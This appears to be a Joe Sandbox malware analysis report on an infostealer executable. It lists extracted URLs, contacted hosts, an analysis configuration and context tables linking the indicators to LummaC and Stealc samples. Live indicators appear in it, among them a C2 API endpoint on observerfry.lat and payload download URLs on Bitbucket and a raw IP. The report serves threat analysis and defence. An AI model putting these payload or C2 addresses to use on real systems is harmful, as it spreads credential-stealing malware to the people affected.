https://duckduckgo.com/chrome_newtab	SFtDA07UDr.exe, 00000000.00000003.1871718842.0000000005D1F000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1872184057.0000000005D1C000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1872934364.0000000005D1C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0	SFtDA07UDr.exe, 00000000.00000002.2463985214.00000000012FA000.00000004.00000010.00020000.00000000.sdmp	false		high
https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-	SFtDA07UDr.exe, 00000000.00000002.2465817210.0000000005CE1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	SFtDA07UDr.exe, 00000000.00000003.1871718842.0000000005D1F000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1872184057.0000000005D1C000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1872934364.0000000005D1C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	SFtDA07UDr.exe, 00000000.00000003.1949866442.0000000005CD9000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1949295757.0000000005CD5000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1950046715.0000000005CDB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/	SFtDA07UDr.exe, 00000000.00000002.2465817210.0000000005CE1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bitbucket.org:443/mynewworkspace123312/scnd/downloads/FormattingCharitable.exeChrome/Default	SFtDA07UDr.exe, 00000000.00000002.2464148316.00000000016A3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	SFtDA07UDr.exe, 00000000.00000003.1871718842.0000000005D1F000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1872184057.0000000005D1C000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1872934364.0000000005D1C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	SFtDA07UDr.exe, 00000000.00000003.1902301601.0000000005D2B000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1902180890.0000000005D2B000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1874681721.0000000005D32000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/	SFtDA07UDr.exe, 00000000.00000002.2465817210.0000000005CE1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net	SFtDA07UDr.exe, 00000000.00000002.2465817210.0000000005CE1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.lga1.admarke	SFtDA07UDr.exe	false	Avira URL Cloud: safe	unknown
https://bbuseruploads.s3.amazonaws.com:443r	SFtDA07UDr.exe, 00000000.00000002.2464148316.00000000016A3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	SFtDA07UDr.exe, 00000000.00000003.1950046715.0000000005CDB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net	SFtDA07UDr.exe, 00000000.00000003.2138432899.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	SFtDA07UDr.exe, 00000000.00000003.1925427609.0000000005D25000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	SFtDA07UDr.exe, 00000000.00000003.1925427609.0000000005D25000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	SFtDA07UDr.exe, 00000000.00000003.1874769883.0000000005D06000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	SFtDA07UDr.exe, 00000000.00000003.1871718842.0000000005D1F000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1872184057.0000000005D1C000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1872934364.0000000005D1C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aui-cdn.atlassian.com/	SFtDA07UDr.exe, 00000000.00000002.2465817210.0000000005CE1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbuseruploads.s3.amazonaws.com:443/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3	SFtDA07UDr.exe, 00000000.00000003.2138520574.000000000171D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://web-security-reports.services.atlassian.com/csp-report/bb-websiteX-Frame-OptionsSAMEORIGINX-	SFtDA07UDr.exe, 00000000.00000003.2138629427.0000000005CDF000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000002.2465817210.0000000005CE1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	SFtDA07UDr.exe, 00000000.00000003.1926488629.0000000005DF5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://observerfry.lat/E	SFtDA07UDr.exe, 00000000.00000003.2046022983.000000000169D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	SFtDA07UDr.exe, 00000000.00000003.1949866442.0000000005CD9000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1949295757.0000000005CD5000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1950046715.0000000005CDB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://observerfry.lat:443/api	SFtDA07UDr.exe, 00000000.00000003.2046022983.00000000016A3000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000002.2464148316.00000000016A3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://observerfry.lat:443/apin.txtPK	SFtDA07UDr.exe, 00000000.00000003.2046022983.00000000016A3000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000002.2464148316.00000000016A3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net	SFtDA07UDr.exe, 00000000.00000002.2465817210.0000000005CE1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	SFtDA07UDr.exe, SFtDA07UDr.exe, 00000000.00000003.1949866442.0000000005CD9000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1949295757.0000000005CD5000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1950046715.0000000005CDB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	SFtDA07UDr.exe, 00000000.00000003.1871718842.0000000005D1F000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1872184057.0000000005D1C000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1872934364.0000000005D1C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://web-security-reports.services.atlassian.com/csp-report/bb-website	SFtDA07UDr.exe, 00000000.00000002.2465895160.0000000005CF6000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.2138432899.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.2138629427.0000000005CDF000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000002.2465817210.0000000005CE1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	SFtDA07UDr.exe, 00000000.00000003.1871718842.0000000005D1F000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1872184057.0000000005D1C000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1872934364.0000000005D1C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	SFtDA07UDr.exe, 00000000.00000003.1925427609.0000000005D25000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	SFtDA07UDr.exe, SFtDA07UDr.exe, 00000000.00000003.1949866442.0000000005CD9000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1949295757.0000000005CD5000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1950046715.0000000005CDB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.6.dr	false		high
https://observerfry.lat/	SFtDA07UDr.exe, 00000000.00000003.1975922228.0000000005CDF000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1924893342.0000000005CDC000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1949295757.0000000005CD5000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1951074863.0000000005CDE000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1925246665.0000000005CDD000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1925412949.0000000005CDF000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1950046715.0000000005CDB000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1926458477.0000000005CDF000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	SFtDA07UDr.exe, 00000000.00000003.1925427609.0000000005D25000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	SFtDA07UDr.exe, 00000000.00000003.1902301601.0000000005D2B000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1902180890.0000000005D2B000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1874681721.0000000005D32000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	SFtDA07UDr.exe, 00000000.00000002.2466286447.00000000063C9000.00000002.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.2138388755.000000000172B000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.2138214038.0000000005D07000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	SFtDA07UDr.exe, 00000000.00000003.1871718842.0000000005D1F000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1872184057.0000000005D1C000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1872934364.0000000005D1C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	SFtDA07UDr.exe, 00000000.00000003.1926488629.0000000005DF5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dz8aopenkvv6s.cloudfront.net	SFtDA07UDr.exe, 00000000.00000002.2465895160.0000000005CF6000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.2138432899.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	SFtDA07UDr.exe, 00000000.00000003.1871718842.0000000005D1F000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1872184057.0000000005D1C000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1872934364.0000000005D1C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://observerfry.lat/apiR	SFtDA07UDr.exe, 00000000.00000003.1954876307.0000000001740000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1993373801.0000000001740000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1955438629.0000000001740000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1993180083.0000000001740000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1980257379.0000000001740000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.micro	SFtDA07UDr.exe, 00000000.00000003.2045355742.0000000001710000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	SFtDA07UDr.exe, 00000000.00000003.1949866442.0000000005CD9000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1949295757.0000000005CD5000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1950046715.0000000005CDB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net	SFtDA07UDr.exe, 00000000.00000002.2465817210.0000000005CE1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.microsof	SFtDA07UDr.exe, 00000000.00000003.1874681721.0000000005D32000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.cookielaw.org/	SFtDA07UDr.exe, 00000000.00000002.2465817210.0000000005CE1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	SFtDA07UDr.exe, 00000000.00000003.1925427609.0000000005D25000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;	SFtDA07UDr.exe, 00000000.00000002.2465817210.0000000005CE1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://observerfry.lat/api~l	SFtDA07UDr.exe, 00000000.00000003.2046022983.00000000016BD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://remote-app-switcher.stg-east.frontend.public.atl-paas.net	SFtDA07UDr.exe, 00000000.00000003.2138432899.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.16/off/def.exe	SFtDA07UDr.exe, 00000000.00000003.2138520574.0000000001704000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000002.2464326767.0000000001708000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	SFtDA07UDr.exe, 00000000.00000003.1874769883.0000000005D06000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	SFtDA07UDr.exe, 00000000.00000003.1871718842.0000000005D1F000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1872184057.0000000005D1C000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1872934364.0000000005D1C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbuseruploads.s3.amazonaws.com/	SFtDA07UDr.exe, 00000000.00000003.2138520574.0000000001704000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575	SFtDA07UDr.exe	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.166.143.48	bitbucket.org	Germany	16509	AMAZON-02US	false
16.182.108.137	s3-w.us-east-1.amazonaws.com	United States	unknown	unknown	false
104.21.36.201	observerfry.lat	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1580351
Start date and time:	2024-12-24 11:21:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 3s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SFtDA07UDr.exe renamed because original name is a hash value
Original Sample Name:	c7c35aa98a21f2d9b5a584f5f32b91a5.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@2/5@3/3
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 104.208.16.94, 172.202.163.200, 20.190.147.7, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
Execution Graph export aborted for target SFtDA07UDr.exe, PID 5576 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: SFtDA07UDr.exe

Simulations

Behavior and APIs

Time	Type	Description
05:22:14	API Interceptor	39x Sleep call for process: SFtDA07UDr.exe modified
05:23:11	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.166.143.48	http://bitbucket.org/aaa14/aaaa/downloads/dFkbkhk.txt	Get hash	malicious	Unknown	Browse	bitbucket.org/aaa14/aaaa/downloads/dFkbkhk.txt
104.21.36.201	O5Vg1CJsxN.exe	Get hash	malicious	LummaC, Stealc	Browse
	4W3cB5WEYH.exe	Get hash	malicious	LummaC	Browse
	yuij5p5p3W.exe	Get hash	malicious	LummaC	Browse
	xlSzrIs5h6.exe	Get hash	malicious	LummaC, Stealc	Browse
	NxqDwaYpbp.exe	Get hash	malicious	LummaC	Browse
	2jx1O1t486.exe	Get hash	malicious	LummaC, Stealc	Browse
	OtHVIQ2ge4.exe	Get hash	malicious	LummaC	Browse
	fr2Mul3G6m.exe	Get hash	malicious	LummaC	Browse
	zLP3oiwG1g.exe	Get hash	malicious	LummaC	Browse
	Yh6fS6qfTE.exe	Get hash	malicious	LummaC	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
observerfry.lat	O5Vg1CJsxN.exe	Get hash	malicious	LummaC, Stealc	Browse	104.21.36.201
	2oM46LNCOo.exe	Get hash	malicious	LummaC	Browse	172.67.199.72
	y001L6lEK4.exe	Get hash	malicious	LummaC, Stealc	Browse	172.67.199.72
	tTGxYWtjG5.exe	Get hash	malicious	LummaC	Browse	172.67.199.72
	iaLId0uLUw.exe	Get hash	malicious	LummaC	Browse	172.67.199.72
	4W3cB5WEYH.exe	Get hash	malicious	LummaC	Browse	104.21.36.201
	ElmEHL9kP9.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	172.67.199.72
	yuij5p5p3W.exe	Get hash	malicious	LummaC	Browse	104.21.36.201
	yO9EAqDV15.exe	Get hash	malicious	LummaC	Browse	172.67.199.72
	Collapse.exe	Get hash	malicious	LummaC	Browse	172.67.199.72
s3-w.us-east-1.amazonaws.com	Gq48hjKhZf.exe	Get hash	malicious	LodaRAT	Browse	3.5.8.193
	2oM46LNCOo.exe	Get hash	malicious	LummaC	Browse	52.217.14.36
	tTGxYWtjG5.exe	Get hash	malicious	LummaC	Browse	16.15.177.52
	iaLId0uLUw.exe	Get hash	malicious	LummaC	Browse	3.5.17.0
	yuij5p5p3W.exe	Get hash	malicious	LummaC	Browse	54.231.128.9
	http://plnbl.io/review/FSUQBEfTfzwH	Get hash	malicious	Unknown	Browse	54.231.128.17
	NAnOVCOt4L.exe	Get hash	malicious	LummaC	Browse	3.5.27.149
	fkawMJ7FH8.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine, Stealc	Browse	3.5.29.203
	OtHVIQ2ge4.exe	Get hash	malicious	LummaC	Browse	52.217.75.84
	fr2Mul3G6m.exe	Get hash	malicious	LummaC	Browse	3.5.25.145
bitbucket.org	Gq48hjKhZf.exe	Get hash	malicious	LodaRAT	Browse	185.166.143.49
	Gq48hjKhZf.exe	Get hash	malicious	Unknown	Browse	185.166.143.48
	2oM46LNCOo.exe	Get hash	malicious	LummaC	Browse	185.166.143.50
	tTGxYWtjG5.exe	Get hash	malicious	LummaC	Browse	185.166.143.48
	iaLId0uLUw.exe	Get hash	malicious	LummaC	Browse	185.166.143.50
	yuij5p5p3W.exe	Get hash	malicious	LummaC	Browse	185.166.143.50
	NAnOVCOt4L.exe	Get hash	malicious	LummaC	Browse	185.166.143.50
	fkawMJ7FH8.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine, Stealc	Browse	185.166.143.48
	OtHVIQ2ge4.exe	Get hash	malicious	LummaC	Browse	185.166.143.49
	fr2Mul3G6m.exe	Get hash	malicious	LummaC	Browse	185.166.143.49

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://app.salesforceiq.com/r?target=631f420eed13ca3bcf77c324&t=AFwhZf065tBQQJtb1QfwP5t--0vgBJ0h_ebIEq5KFXSXqUZai5J8FQSwWrq93GQOlAns9KDGvW4ICfvxj8Z5CJD1Q9Wt5o0NW5c0cKHizUAbubpaOgmKjcVLdh1YXO2nIltTeoePggUL&url=https://monaghans.jimdosite.com	Get hash	malicious	HTMLPhisher	Browse	162.159.128.70
	https://office356quilter.krkonqghz.ru/Vt2VD2f3#https://outlookofficecom/mail/deleteditems/id/AAQkADU5#aGVpZGkuZGlsa0BxdWlsdGVyLmNvbQ==	Get hash	malicious	Unknown	Browse	104.21.17.63
	http://au.kirmalk.com/watch.php?vid=7750fd3c8	Get hash	malicious	Unknown	Browse	172.67.207.202
	eCompleted_419z.pdf	Get hash	malicious	HTMLPhisher	Browse	104.21.112.1
	3zg6i6Zu1u.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	oiF7u78bY2.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	L5Kgf2Tvkc.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	LVDdWBGnVE.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.63.229
	O5Vg1CJsxN.exe	Get hash	malicious	LummaC, Stealc	Browse	104.21.36.201
	2oM46LNCOo.exe	Get hash	malicious	LummaC	Browse	172.67.199.72
AMAZON-02US	https://app.salesforceiq.com/r?target=631f420eed13ca3bcf77c324&t=AFwhZf065tBQQJtb1QfwP5t--0vgBJ0h_ebIEq5KFXSXqUZai5J8FQSwWrq93GQOlAns9KDGvW4ICfvxj8Z5CJD1Q9Wt5o0NW5c0cKHizUAbubpaOgmKjcVLdh1YXO2nIltTeoePggUL&url=https://monaghans.jimdosite.com	Get hash	malicious	HTMLPhisher	Browse	54.73.104.6
	nsharm5.elf	Get hash	malicious	Unknown	Browse	54.171.230.55
	Gq48hjKhZf.exe	Get hash	malicious	LodaRAT	Browse	185.166.143.49
	Gq48hjKhZf.exe	Get hash	malicious	Unknown	Browse	185.166.143.48
	2oM46LNCOo.exe	Get hash	malicious	LummaC	Browse	185.166.143.50
	tTGxYWtjG5.exe	Get hash	malicious	LummaC	Browse	185.166.143.48
	iaLId0uLUw.exe	Get hash	malicious	LummaC	Browse	185.166.143.50
	yuij5p5p3W.exe	Get hash	malicious	LummaC	Browse	185.166.143.50
	sh4.nn.elf	Get hash	malicious	Okiru	Browse	54.171.230.55
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse	54.171.230.55

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	3zg6i6Zu1u.exe	Get hash	malicious	LummaC	Browse	104.21.36.201 185.166.143.48 16.182.108.137
	oiF7u78bY2.exe	Get hash	malicious	LummaC	Browse	104.21.36.201 185.166.143.48 16.182.108.137
	L5Kgf2Tvkc.exe	Get hash	malicious	LummaC	Browse	104.21.36.201 185.166.143.48 16.182.108.137
	LVDdWBGnVE.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.36.201 185.166.143.48 16.182.108.137
	O5Vg1CJsxN.exe	Get hash	malicious	LummaC, Stealc	Browse	104.21.36.201 185.166.143.48 16.182.108.137
	2oM46LNCOo.exe	Get hash	malicious	LummaC	Browse	104.21.36.201 185.166.143.48 16.182.108.137
	J18uCKmoAw.exe	Get hash	malicious	LummaC	Browse	104.21.36.201 185.166.143.48 16.182.108.137
	y001L6lEK4.exe	Get hash	malicious	LummaC, Stealc	Browse	104.21.36.201 185.166.143.48 16.182.108.137
	tTGxYWtjG5.exe	Get hash	malicious	LummaC	Browse	104.21.36.201 185.166.143.48 16.182.108.137
	iaLId0uLUw.exe	Get hash	malicious	LummaC	Browse	104.21.36.201 185.166.143.48 16.182.108.137

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_SFtDA07UDr.exe_45cbe07c72cddbd1a06ff14a664cd7ed68f9a0_510239c7_9667593d-5e68-47a3-89b3-c5c54eca2509\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0434691415245432
Encrypted:	false
SSDEEP:	96:Y+F9E76s9hYoI7JfPQXIDcQvc6QcEVcw3cE/P+HbHg/8BRTf3Oy1oVazW0EVs2fR:3076o0BU/Ijudx2fzuiFEZ24IO83
MD5:	C9D837FC9211370C69734EC88C2C0020
SHA1:	C4AEA3CF369C23D605FA5426467A3720729256CD
SHA-256:	CC7B70EDFBB2F7484C6565FE4E192A66B24143C23E3FF212D599DA40DA81DEEB
SHA-512:	45A391C991A497E37AC434FD57280CACBBBB85223563BEBBB51B4B5CBB1F1B29EA303C505962211F7525AB9D7A8C9BFCF9B49A8CABE68EE09BFF4DB111B92F2A
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.5.0.9.3.6.3.5.7.6.1.7.9.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.5.0.9.3.6.5.2.4.8.0.6.8.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.6.6.7.5.9.3.d.-.5.e.6.8.-.4.7.a.3.-.8.9.b.3.-.c.5.c.5.4.e.c.a.2.5.0.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.7.7.1.9.5.a.0.-.a.0.5.7.-.4.a.0.7.-.b.c.d.4.-.b.c.7.8.1.8.4.0.4.6.1.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.F.t.D.A.0.7.U.D.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.c.8.-.0.0.0.1.-.0.0.1.4.-.5.f.c.7.-.2.7.a.f.e.d.5.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.6.e.b.3.8.4.7.3.0.0.6.4.8.8.5.c.e.d.c.0.f.7.f.6.f.4.d.4.a.7.e.0.0.0.0.f.f.f.f.!.0.0.0.0.b.9.a.1.3.5.d.c.e.7.f.5.f.d.b.a.a.c.0.3.a.8.4.6.5.0.c.8.6.9.